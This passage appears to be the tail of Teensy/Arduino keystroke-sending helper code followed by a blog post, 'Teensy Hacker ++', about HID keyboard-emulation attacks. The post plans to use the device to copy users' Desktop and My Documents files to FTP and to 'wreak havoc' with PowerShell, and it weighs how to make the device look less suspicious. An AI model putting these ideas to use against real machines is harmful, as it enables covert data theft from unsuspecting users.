    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_BACKSPACE);
    Keyboard.send_now();
    delay(100);

    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(100);
}

void Enter()
{
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
}

/*
Check out @pastebin n3onli8.cpp http://pastebin.com/Q5bkU1t8
n3onli8.h http://pastebin.com/trrtYdec
save the .h and .cpp file in a folder called n3onli8 in arduino-0022\arduino-0022\libraries\
please note the numbers may vary with your version of Arduino SDK

Send me your ideas on library functions.
*/

Teensy Hacker ++

Earlier this year at Defcon I got introduced to the world of exploiting (HID) human interface devices. At first I was wowed by the simplicity of the attack. I could not wait to get my hands on my first Teensy from www.pjrc.com.
Initial issues with the board:
  1. Comes with Mini - USB connector. (Creates suspicion, USB drive looks like a tool)
  2. Not enough on board memory to carry payload.
  3. On first run, depending on the system it's being plugged into, there could be a fair bit of delay for the drivers to initialize, which means the code may start executing before the keyboard is ready and the exploit is a FAIL!
Initial usage for Teensy:
  1. Prank tool: Mess with Desktop, random key strokes...You get the point
  2. Copy files from "Desktop" or "My Documents" to ftp
  3. Use PowerShell to wreak havoc!

Next Post: I will be putting up some code for the Teensy...